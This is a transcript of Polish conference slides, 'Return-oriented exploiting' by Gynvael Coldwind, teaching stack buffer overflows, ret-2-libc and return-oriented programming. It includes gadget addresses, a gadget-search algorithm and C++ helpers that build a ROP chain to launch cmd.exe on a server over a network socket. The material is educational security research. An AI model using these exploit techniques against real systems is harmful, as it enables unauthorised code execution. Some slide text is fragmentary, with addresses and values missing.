Return-oriented exploiting

Transkrypt

1 HISPASEC Return-oriented exploiting by Gynvael Coldwind

2 Dramatis Personæ Gynvael Coldwind - obecnie spec. ds. bezp. Hispasec - wcześniej ArcaBit - autor kilku artykułów (Hakin9 i Xploit) - prowadzi bloga technicznego ( - team Vexillium ( Return-oriented exploiting 2 /

3 Menu 1. Przypomnienie tematyki BO 2. Problem niewykonywalnego stosu 3. Enter teh ret-2-libc 4. Do czego wracać? 5. Pseudo-język pseudo-skryptowy 6. Skoki warunkowe i pętle 7. Luźne rozważania Czas na pytania Return-oriented exploiting 3 /

4 Stack Buffer Overflow STOS... śmieci śmieci śmieci śmieci śmieci śmieci śmieci ESP śmieci śmieci śmieci... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } Return-oriented exploiting 4 /

5 Stack Buffer Overflow STOS... śmieci śmieci śmieci śmieci śmieci śmieci śmieci ESP śmieci EBP RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } Return-oriented exploiting 5 /

6 Stack Buffer Overflow STOS... śmieci śmieci śmieci śmieci śmieci ESP śmieci buffer śmieci buffer EBP RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } Return-oriented exploiting 6 /

7 Stack Buffer Overflow STOS... śmieci ESP śmieci śmieci RET &buffer argv[1] buffer śmieci buffer EBP RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } AAAAAAAAAAAAAAAA Return-oriented exploiting 7 /

8 Stack Buffer Overflow STOS... śmieci ESP śmieci śmieci RET &buffer argv[1] AAAA śmieci buffer EBP RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } AAAAAAAAAAAAAAAA Return-oriented exploiting 8 /

9 Stack Buffer Overflow STOS... śmieci ESP śmieci śmieci RET &buffer argv[1] AAAA śmieci AAAA EBP RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } AAAAAAAAAAAAAAAA Return-oriented exploiting 9 /

10 Stack Buffer Overflow STOS... śmieci ESP śmieci śmieci RET &buffer argv[1] AAAA śmieci AAAA AAAA RET... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } AAAAAAAAAAAAAAAA Return-oriented exploiting 10 /

11 Stack Buffer Overflow STOS... śmieci ESP śmieci śmieci RET &buffer argv[1] AAAA śmieci AAAA AAAA AAAA... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } AAAAAAAAAAAAAAAA Return-oriented exploiting 11 /

12 Stack Buffer Overflow STOS... śmieci śmieci śmieci RET &buffer ESP argv[1] AAAA śmieci AAAA AAAA AAAA... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } Return-oriented exploiting 12 /

13 Stack Buffer Overflow STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA AAAA... EIP PROGRAM int main(int argc, char **argv) { char buffer[8]; strcpy(buffer, argv[1]); return 0; } Return-oriented exploiting 13 /

14 Stack Buffer Overflow STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA AAAA... PROGRAM EIP = 0x (AAAA) Return-oriented exploiting 14 /

15 Stack Buffer Overflow Wystarczy zmienić dwie rzeczy w prezentowanym przykładzie aby wykonać dowolny, dostarczony przez atakującego, kod: 1. Shellcode w buforze lub po adresie RET 2. Nadpisanie RET adresem shellcode'u Return-oriented exploiting 15 /

16 Przeciwdziałanie skutkom BO 1. Losowy adres stosu Return-oriented exploiting 16 /

17 Przeciwdziałanie skutkom BO 1. Losowy adres stosu 2. Niewykonywalny stos (NX/XD) Return-oriented exploiting 17 /

18 Enter teh ret-2-libc return to libc technika wykorzystywania stack buffer overflow polegająca na użyciu istniejącego kodu zawartego w bibliotekach oraz w samej aplikacji Return-oriented exploiting 18 /

19 Enter teh ret-2-libc Rok 1997: Solar Designer tworzy pierwszy exploit typu ret-2-libc ( Return-oriented exploiting 19 /

20 Enter teh ret-2-libc Rok 1997: Solar Designer tworzy pierwszy exploit typu ret-2-libc ( Rok 2001: Artykuł Nergal'a w Phrack 0x3a The advanced return-into-lib(c) exploits ( Return-oriented exploiting 20 /

21 Enter teh ret-2-libc Rok 2008: Erik Buchanan, Ryan Roemer, Stefan Savage i Hovav Shacham z University of California Return-oriented BlackHat ( Return-oriented exploiting 21 /

22 Enter teh ret-2-libc ret-2-libc vs. losowość stosu = ret-2-esp Return-oriented exploiting 22 /

23 Enter teh ret-2-libc ret-2-libc vs. losowość stosu = ret-2-esp 1. Znajdź w pamięci instrukcję jmp ESP (FF E4) lub call ESP (FF D4) Return-oriented exploiting 23 /

24 Enter teh ret-2-libc ret-2-libc vs. losowość stosu = ret-2-esp 1. Znajdź w pamięci instrukcję jmp ESP (FF E4) lub call ESP (FF D4) 2. Nadpisz RET adresem tej instrukcji (zakładając że shellcode jest po RET) Return-oriented exploiting 24 /

25 Enter teh ret-2-libc Trochę liczb! Ilość wystąpień FF E4 lub FF D4 per biblioteka systemowa: PLIK FF E4 FF D4 Vista kernel32.dll 1 0 Vista ntdll.dll 3 2 Vista gdi32.dll 1 2 Vista user32.dll Return-oriented exploiting 25 /

26 Enter teh ret-2-libc Trochę liczb! Ilość wystąpień FF E4 lub FF D4 per biblioteka systemowa: PLIK FF E4 FF D4 XP2 user32.dll XP2 kernel32.dll 0 2 XP2 ntdll.dll 1 3 XP3 kernel32.dll 1 2 Return-oriented exploiting 26 /

27 Enter teh ret-2-libc Trochę liczb! Ilość wystąpień FF E4 lub FF D4 per biblioteka systemowa: PLIK FF E4 FF D4 OSX Foundation ~306 ~354 OSX CoreFoundation ~153 ~93 Return-oriented exploiting 27 /

28 Enter teh ret-2-libc Trochę liczb! Ilość wystąpień FF E4 lub FF D4 per biblioteka systemowa: PLIK FF E4 FF D4 libc so linux-gate.so.1 1* 0* Return-oriented exploiting 28 /

29 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA RET argc argv envp śmieci Return-oriented exploiting 29 /

30 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA system() argc argv envp śmieci Return-oriented exploiting 30 /

31 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA system() exit() argv envp śmieci Return-oriented exploiting 31 /

32 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA system() exit() adres /bin /sh\0 śmieci Return-oriented exploiting 32 /

33 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA ESP śmieci AAAA AAAA system() exit() adres /bin /sh\0 śmieci EIP = instrukcja ret w main() Return-oriented exploiting 33 /

34 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA śmieci AAAA AAAA ESP system() exit() adres /bin /sh\0 śmieci EIP = system( /bin/sh ) Return-oriented exploiting 34 /

35 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos STOS... śmieci śmieci śmieci RET &buffer argv[1] AAAA śmieci AAAA AAAA ESP system() ESP exit() adres /bin /sh\0 śmieci EIP = exit(0x6e69622f) Return-oriented exploiting 35 /

36 Enter teh ret-2-libc ret-2-libc vs. niewykonywalny stos Wniosek: Atakujący spowodował uruchomienie shell'a, mimo iż CPU nie wykonał żadnej instrukcji dostarczonej przez atakującego! Return-oriented exploiting 36 /

37 Do czego wracać? ret-2-??? Return-oriented exploiting 37 /

38 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! Return-oriented exploiting 38 /

39 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) Return-oriented exploiting 39 /

40 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) - ret-2-application Return-oriented exploiting 40 /

41 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) - ret-2-application - ret-2-data Return-oriented exploiting 41 /

42 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) - ret-2-application - ret-2-data - ret-2-headers Return-oriented exploiting 42 /

43 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) - ret-2-application - ret-2-data - ret-2-headers - ret-2-shared-memory Return-oriented exploiting 43 /

44 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-lib(c) - ret-2-application - ret-2-data - ret-2-headers - ret-2-shared-memory - ret-2-mapped-files Return-oriented exploiting 44 /

45 Do czego wracać? ret-2-??? Można wrócić do każdego adresu który jest w pamięci wykonywalnej! - ret-2-anything Return-oriented exploiting 45 /

46 Do czego wracać? Do czego warto wracać? Return-oriented exploiting 46 /

47 Do czego wracać? Do czego warto wracać? Warto wracać do każdej sekwencji opcode'ów zakończonej poleceniem powrotu: RET lub RETN X Return-oriented exploiting 47 /

48 Do czego wracać? Do czego warto wracać? Warto wracać do każdej sekwencji opcode'ów zakończonej poleceniem powrotu: RET lub RETN X POP rejestr + JMP rejestr Return-oriented exploiting 48 /

49 Do czego wracać? Do czego warto wracać? Warto wracać do każdej sekwencji opcode'ów zakończonej poleceniem powrotu: RET lub RETN X POP rejestr + JMP rejestr dowolna analogiczna sekwencja Return-oriented exploiting 49 /

50 Do czego wracać?!!! WAŻNE!!! Oprócz sekwencji celowo zakończonych opcodem RET (C3) lub RETN (C2) możemy powracać również do sekwencji w których wystąpienie C3/C2 jest przypadkowe! Return-oriented exploiting 50 /

51 Do czego wracać? Przykład: mov eax, 0x0000C358 Return-oriented exploiting 51 /

52 Do czego wracać? Przykład: mov eax, 0x0000C358 B8 58 C Return-oriented exploiting 52 /

53 Do czego wracać? Przykład: mov eax, 0x0000C358 B8 58 C mov eax, 0x0000C358 Return-oriented exploiting 53 /

54 Do czego wracać? Przykład: mov eax, 0x0000C358 B8 58 C mov eax, 0x0000C358 pop eax ret Return-oriented exploiting 54 /

55 Do czego wracać? Wyszukiwanie sekwencji... Return-oriented exploiting 55 /

56 Do czego wracać? Wyszukiwanie sekwencji... Dla każdego bajtu: 1. Jeżeli bajt jest równy C3 lub C2: 1.1. Cofnij się o 10 bajtów 1.2. Zdisassembluj instrukcje 1.3. Idź do nastepnego bajtu 1.4. Jeżeli nie dotarłeś jeszcze do C3/C2, idź do punktu Idź do następnego bajtu Return-oriented exploiting 56 /

57 Do czego wracać? Wyszukiwanie sekwencji... Należy wykonać zaprezentowany algorytm dla każdego obszaru pamięci wykonywalnej atakowanej aplikacji. Wynikiem działania algorytmu jest lista sekwencji instrukcji i ich adresów. Return-oriented exploiting 57 /

58 Do czego wracać? DEMO 01 i 02 Return-oriented exploiting 58 /

59 Do czego wracać? Co ciekawego znalazł rta_finder.exe? Return-oriented exploiting 59 /

60 Do czego wracać? Co ciekawego znalazł rta_finder.exe? a0c (2) POP ECX RET SetECX(a) 6678a0c2 a Return-oriented exploiting 60 /

61 Do czego wracać? Co ciekawego znalazł rta_finder.exe? c3cb2a ---- (2) POP EDX RET SetEDX(a) 77c3cb2a a Return-oriented exploiting 61 /

62 Do czego wracać? Co ciekawego znalazł rta_finder.exe? c33c (3) MOV [EDX], ECX RET Poke(a,b) SetECX(a) SetECX(b) 77c33c42 Return-oriented exploiting 62 /

63 Pseudo-język pseudo-skryptowy Ułatwiamy sobie tworzenie exploitów! Potrzebne będą: - Komplikator języka C++ - Nasz ulubiony edytor Return-oriented exploiting 63 /

64 Pseudo-język pseudo-skryptowy vector<dword> exploit; exploit.resize(20); #define ADDR_SETECX 0x6678a0c1 void SetECX(DWORD a) { exploit.push_back(addr_setecx); exploit.push_back(a); } Return-oriented exploiting 64 /

65 Pseudo-język pseudo-skryptowy #define ADDR_SETEDX 0x77c3cb29 void SetEDX(DWORD a) { } exploit.push_back(addr_setedx); exploit.push_back(a); Return-oriented exploiting 65 /

66 Pseudo-język pseudo-skryptowy #define ADDR_POKE 0x77c33c40 void Poke(DWORD dst, DWORD a) { } SetECX(a); SetEDX(dst); exploit.push_back(addr_poke); Return-oriented exploiting 66 /

67 Pseudo-język pseudo-skryptowy void Emit(DWORD dst, const void *what, DWORD count) { } DWORD *dwhat = (DWORD*)what; for(; count >= 4; dst+=4, count-=4, dwhat++) Poke(dst, *dwhat); Return-oriented exploiting 67 /

68 Pseudo-język pseudo-skryptowy void Emit(DWORD dst, const void *what, DWORD count) { } DWORD *dwhat = (DWORD*)what; for(; count >= 4; dst+=4, count-=4, dwhat++) Poke(dst, *dwhat); Return-oriented exploiting 68 /

69 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami STOS addr śmieci następny funkcji RET... ESP śmieci arg1 arg2 oczekiwany RET arg EIP = X Return-oriented exploiting 69 /

70 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET STOS addr śmieci następny funkcji RET ESP arg1 arg2 arg EIP = addr funkcji Return-oriented exploiting 70 /

71 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET STOS addr śmieci następny funkcji RET ESP arg1 arg2 arg EIP = następny RET Return-oriented exploiting 71 /

72 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET STOS addr śmieci następny funkcji RET ESP arg1 arg2 arg EIP = arg1 Return-oriented exploiting 72 /

73 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami addr funkcji STOS adres POP x3... ESP śmieci śmieci arg1 arg2 oczekiwany RET arg pop EAX pop EDX pop EBP ret EIP = X Return-oriented exploiting 73 /

74 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET addr funkcji STOS adres POP x3 ESP śmieci arg1 arg2 arg pop EAX pop EDX pop EBP ret EIP = addr funkcji Return-oriented exploiting 74 /

75 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET addr funkcji śmieci STOS adres POP x3 ESP arg1 arg2 arg pop EAX pop EDX pop EBP ret EIP = pop EAX Return-oriented exploiting 75 /

76 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET addr funkcji śmieci STOS adres POP x3 ESP arg1 arg2 arg pop EAX pop EDX pop EBP ret EIP = pop EDX Return-oriented exploiting 76 /

77 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany RET addr funkcji śmieci STOS adres POP x3 arg1 ESP arg2 arg pop EAX pop EDX pop EBP ret EIP = pop EBP Return-oriented exploiting 77 /

78 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami ESP oczekiwany RET addr funkcji śmieci STOS adres POP x3 arg1 arg2 arg pop EAX pop EDX pop EBP ret EIP = ret Return-oriented exploiting 78 /

79 Pseudo-język pseudo-skryptowy Problem wywoływania funkcji z parametrami oczekiwany ESP RET addr funkcji śmieci STOS adres POP x3 arg1 arg2 arg pop EAX pop EDX pop EBP ret EIP = oczekiwany RET Return-oriented exploiting 79 /

80 Pseudo-język pseudo-skryptowy void Call_system(DWORD what) { exploit.push_back( } GetAPIAddress( "msvcrt.dll", "system")); exploit.push_back(addr_setecx); exploit.push_back(what); Return-oriented exploiting 80 /

81 Pseudo-język pseudo-skryptowy DWORD GetAPIAddress( const char *lib, const char *name) { return (DWORD)GetProcAddress( GetModuleHandle(lib), name); } Return-oriented exploiting 81 /

82 Pseudo-język pseudo-skryptowy Exploitujemy server.exe! Quest: Odpalić cmd.exe z prawami usera admin. Return-oriented exploiting 82 /

83 Pseudo-język pseudo-skryptowy exploit.resize(28 / 4); DWORD SomeFreeSpace=0x ; Emit(SomeFreeSpace, "c:\\windows\\system32" "\\cmd.exe\0", 28); Call_system(SomeFreeSpace); Return-oriented exploiting 83 /

84 Pseudo-język pseudo-skryptowy NetSock s; s.connect(" ", 33333); s.write( &exploit[0], exploit.size()*4); s.disconnect(); Return-oriented exploiting 84 /

85 Pseudo-język pseudo-skryptowy DEMO 03 Return-oriented exploiting 85 /

86 Skoki i pętle Mechanizm skoków - labele (kompilacja jednoprzebiegowa) struct StrCmp { bool operator()( const char* s1, const char* s2) const { return strcmp( s1, s2 ) < 0; } }; map<const char*, DWORD, StrCmp> labels; Return-oriented exploiting 86 /

87 Skoki i pętle Mechanizm skoków - labele (kompilacja jednoprzebiegowa) void Label(const char *label) { labels[strdup(label)] = exploit.size() * 4; } Return-oriented exploiting 87 /

88 Skoki i pętle Skok bezwarunkowy: (Ważne: ESP jest naszym EIP!) e942dd ---- (2) ADD ESP, [EBX] RET Return-oriented exploiting 88 /

89 Skoki i pętle Skok bezwarunkowy: (Ważne: ESP jest naszym EIP!) void Jump(const char *label) { DWORD Current = (exploit.size() + 8) * 4; DWORD RelJump = labels[label] - Current; Poke(SOME_FREE_SPACE, RelJump); SetEBX(SOME_FREE_SPACE); exploit.push_back(addr_addesppebx); } Return-oriented exploiting 89 /

90 Skoki i pętle Skok bezwarunkowy: Przykład użycia (pętla nieskończona): Label("start"); Jump("start"); Return-oriented exploiting 90 /

91 Skoki i pętle Skok bezwarunkowy: Przykład użycia (pętla nieskończona): DEMO 04 Return-oriented exploiting 91 /

92 Skoki i pętle Skoki w przód: Należy zrobić dwuprzebiegową kompilacje, z opóźnionym uzupełnianiem exploita. Wywołanie funkcji i niszczenie stosu: Funkcje korzystając ze stosu niszczą go, przez co przeplatanie pętli z wywołaniami funkcji jest utrudnione. Return-oriented exploiting 92 /

93 Skoki i pętle Skoki warunkowe: Nie możemy używać Jcc (jnz, jne, etc) ponieważ Jcc zmienia EIP a nie ESP! Co zamiast Jcc? Return-oriented exploiting 93 /

94 Skoki i pętle SETcc i trochę matematyki! :) Return-oriented exploiting 94 /

95 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 Return-oriented exploiting 95 /

96 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B B B Return-oriented exploiting 96 /

97 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B TEST EAX, EAX SETNZ AL MOVZX EAX, AL B B 0 1 Return-oriented exploiting 97 /

98 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B TEST EAX, EAX SETNZ AL MOVZX EAX, AL DEC EAX B B 0 1 FFFFFFFF 0 Return-oriented exploiting 98 /

99 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B TEST EAX, EAX SETNZ AL MOVZX EAX, AL DEC EAX NOT EAX B B 0 1 FFFFFFFF 0 0 FFFFFFFF Return-oriented exploiting 99 /

100 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B TEST EAX, EAX SETNZ AL MOVZX EAX, AL DEC EAX NOT EAX AND EAX, A B B 0 1 FFFFFFFF 0 0 FFFFFFFF 0 A Return-oriented exploiting 100/

101 Skoki i pętle Przykład: Skocz do A jeżeli zmienna B!= 0 MOV EAX, B TEST EAX, EAX SETNZ AL MOVZX EAX, AL DEC EAX NOT EAX AND EAX, A B B 0 1 FFFFFFFF 0 ADD ESP, EAX 0 FFFFFFFF 0 A Return-oriented exploiting 101/

102 Skoki i pętle Zamiast TEST i SETcc można pobrać rejestr EFLAGS i na nim operować. (Return-oriented BH 2008) Return-oriented exploiting 102/

103 Luźne rozważania... A tak naprawdę wystarczy zapis do pamięci... (VirtualAlloc, rozpakowanie kodu, RET) Return-oriented exploiting 103/

104 Luźne rozważania... Anty ret-2-anything czyli ASLR: Vista vs OS X vs Linux-based Return-oriented exploiting 104/

105 Luźne rozważania... A gdyby tak użyć ret-2-anything jako zabezpieczenie przed RE? (trace) Return-oriented exploiting 105/

106 Luźne rozważania... Kompilacja C/Pascala/Javy do RTA? Return-oriented exploiting 106/

107 The End Dziękuje za uwagę! Czas na pytania ;> -=(* -=(* blog *)= Return-oriented exploiting 107/